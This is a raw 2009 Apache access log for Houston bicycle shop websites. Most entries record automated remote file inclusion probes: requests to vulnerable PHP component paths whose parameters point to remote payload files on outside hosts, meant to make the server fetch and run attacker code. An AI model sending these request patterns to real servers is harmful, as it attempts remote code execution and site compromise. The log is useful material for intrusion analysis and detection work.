125.251.147.194 - - [11/Oct/2009:07:48:35 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.229.58.122 - - [11/Oct/2009:07:55:33 -0700] "GET /logs//main.php?sayfa=http://flipmydesign.com/.../id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.229.58.122 - - [11/Oct/2009:07:55:33 -0700] "GET /main.php?sayfa=http://flipmydesign.com/.../id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
203.229.58.122 - - [11/Oct/2009:07:55:34 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://flipmydesign.com/.../id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.38.0.130 - - [11/Oct/2009:07:56:12 -0700] "GET /logs/access.log%20%20/?dir=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.38.0.130 - - [11/Oct/2009:07:56:12 -0700] "GET /?dir=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.38.0.130 - - [11/Oct/2009:07:56:12 -0700] "GET /logs/?dir=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.38.0.130 - - [11/Oct/2009:08:01:54 -0700] "GET /logs/access.log%20%20/?dir=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.38.0.130 - - [11/Oct/2009:08:01:54 -0700] "GET /logs/?dir=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.38.0.130 - - [11/Oct/2009:08:01:54 -0700] "GET /?dir=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.38.0.130 - - [11/Oct/2009:08:03:16 -0700] "GET /logs/access.log/?dir=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.228.191.194 - - [11/Oct/2009:08:04:38 -0700] "GET /logs/access.log%20%20/?mosConfig_absolute_path=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.228.191.194 - - [11/Oct/2009:08:04:38 -0700] "GET /logs/?mosConfig_absolute_path=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.228.191.194 - - [11/Oct/2009:08:04:38 -0700] "GET /?mosConfig_absolute_path=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:08:47 -0700] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://ilos.fileave.com/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:08:47 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://ilos.fileave.com/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:08:51 -0700] "GET /skin/zero_vote/login.php?dir=http://ilos.fileave.com/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:08:51 -0700] "GET /skin/zero_vote/login.php?dir=http://ilos.fileave.com/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:08:51 -0700] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://ilos.fileave.com/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:08:54 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://ilos.fileave.com/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.228.191.194 - - [11/Oct/2009:08:13:08 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.228.191.194 - - [11/Oct/2009:08:13:14 -0700] "GET /logs/access.log%20%20/?mosConfig_absolute_path=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.228.191.194 - - [11/Oct/2009:08:13:14 -0700] "GET /?mosConfig_absolute_path=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.228.191.194 - - [11/Oct/2009:08:13:14 -0700] "GET /logs/?mosConfig_absolute_path=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [11/Oct/2009:08:16:52 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [11/Oct/2009:08:16:52 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [11/Oct/2009:08:16:52 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:08:19:46 -0700] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:08:19:46 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:08:19:46 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:08:22:09 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:08:22:09 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:08:22:09 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.38.0.130 - - [11/Oct/2009:08:23:52 -0700] "GET /logs/access.log/?dir=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.125.169.162 - - [11/Oct/2009:08:26:00 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:27:57 -0700] "GET /logs/access.log//skin/zero_vote/login.php?dir=http://ilos.fileave.com/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:28:12 -0700] "GET /logs/access.log//skin/zero_vote/login.php?dir=http://ilos.fileave.com/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
221.143.46.189 - - [11/Oct/2009:08:42:39 -0700] "GET /logs/access.log//skin/ggambo7002_board/comment_modify.php?dir=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
221.143.46.189 - - [11/Oct/2009:08:42:39 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
221.143.46.189 - - [11/Oct/2009:08:42:39 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://kb27.co.kr/bbs///data/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:45:55 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:46:00 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:46:00 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:46:00 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:46:00 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:08:46:04 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.189.9.9 - - [11/Oct/2009:08:54:01 -0700] "GET /include/write.php?dir=http://kaffka-koll.pfk.u-kaposvar.hu/components/com_rwcards/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:09:02:35 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:09:02:59 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.11.145.8 - - [11/Oct/2009:09:03:41 -0700] "GET /logs/access.log////write.php?dir=http://88.27.253.185:8080/sempak.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Oct/2009:09:03:41 -0700] "GET ///write.php?dir=http://88.27.253.185:8080/sempak.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Oct/2009:09:03:41 -0700] "GET /logs////write.php?dir=http://88.27.253.185:8080/sempak.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
213.189.9.9 - - [11/Oct/2009:09:11:02 -0700] "GET /logs/access.log//include/write.php?dir=http://kaffka-koll.pfk.u-kaposvar.hu/components/com_rwcards/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
213.189.9.9 - - [11/Oct/2009:09:11:02 -0700] "GET /include/write.php?dir=http://kaffka-koll.pfk.u-kaposvar.hu/components/com_rwcards/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
213.189.9.9 - - [11/Oct/2009:09:11:02 -0700] "GET /logs//include/write.php?dir=http://kaffka-koll.pfk.u-kaposvar.hu/components/com_rwcards/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
81.19.67.243 - - [11/Oct/2009:09:12:40 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:15:54 -0700] "GET /logs/access.log%20%20//?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:15:54 -0700] "GET /?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:15:54 -0700] "GET /logs//?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.107.162.36 - - [11/Oct/2009:09:16:10 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:16:14 -0700] "GET /logs/access.log%20%20//?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:16:14 -0700] "GET /?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:16:14 -0700] "GET /logs//?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.107.162.36 - - [11/Oct/2009:09:16:19 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
118.107.162.36 - - [11/Oct/2009:09:16:19 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
189.38.252.46 - - [11/Oct/2009:09:17:36 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
189.38.252.46 - - [11/Oct/2009:09:17:37 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
189.38.252.46 - - [11/Oct/2009:09:17:38 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
189.38.252.46 - - [11/Oct/2009:09:17:49 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
189.38.252.46 - - [11/Oct/2009:09:17:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
189.38.252.46 - - [11/Oct/2009:09:17:50 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:17:54 -0700] "GET /logs/access.log//?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:17:54 -0700] "GET /?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:17:54 -0700] "GET /logs//?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:17:57 -0700] "GET /logs/access.log//?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:17:57 -0700] "GET /logs//?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:17:57 -0700] "GET /?sourcedir=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.189.9.9 - - [11/Oct/2009:09:19:06 -0700] "GET /logs/access.log//include/write.php?dir=http://kaffka-koll.pfk.u-kaposvar.hu/components/com_rwcards/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
213.189.9.9 - - [11/Oct/2009:09:19:06 -0700] "GET /logs//include/write.php?dir=http://kaffka-koll.pfk.u-kaposvar.hu/components/com_rwcards/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
99.34.44.130 - - [11/Oct/2009:09:22:14 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.fisherbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; MEGAUPLOAD 2.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
99.34.44.130 - - [11/Oct/2009:09:22:15 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; MEGAUPLOAD 2.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
61.135.134.78 - - [11/Oct/2009:09:25:33 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:25:33 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:25:33 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:26:24 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:26:24 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:26:24 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
189.38.252.46 - - [11/Oct/2009:09:26:45 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
189.38.252.46 - - [11/Oct/2009:09:26:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:09:26:46 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
189.38.252.46 - - [11/Oct/2009:09:26:47 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:09:27:00 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:09:27:00 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:09:27:00 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
189.38.252.46 - - [11/Oct/2009:09:27:06 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
79.64.198.159 - - [11/Oct/2009:09:27:08 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.64.198.159 - - [11/Oct/2009:09:27:08 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.64.198.159 - - [11/Oct/2009:09:27:20 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.64.198.159 - - [11/Oct/2009:09:27:20 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.64.198.159 - - [11/Oct/2009:09:27:21 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.64.198.159 - - [11/Oct/2009:09:27:21 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.64.198.159 - - [11/Oct/2009:09:27:24 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.64.198.159 - - [11/Oct/2009:09:27:29 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:09:27:31 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:09:27:31 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:09:27:31 -0700] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:09:27:37 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:09:27:37 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
125.251.147.194 - - [11/Oct/2009:09:27:37 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
125.251.147.194 - - [11/Oct/2009:09:27:37 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
61.135.134.78 - - [11/Oct/2009:09:28:00 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.135.134.78 - - [11/Oct/2009:09:28:05 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
61.135.134.78 - - [11/Oct/2009:09:28:05 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
61.135.134.78 - - [11/Oct/2009:09:28:05 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
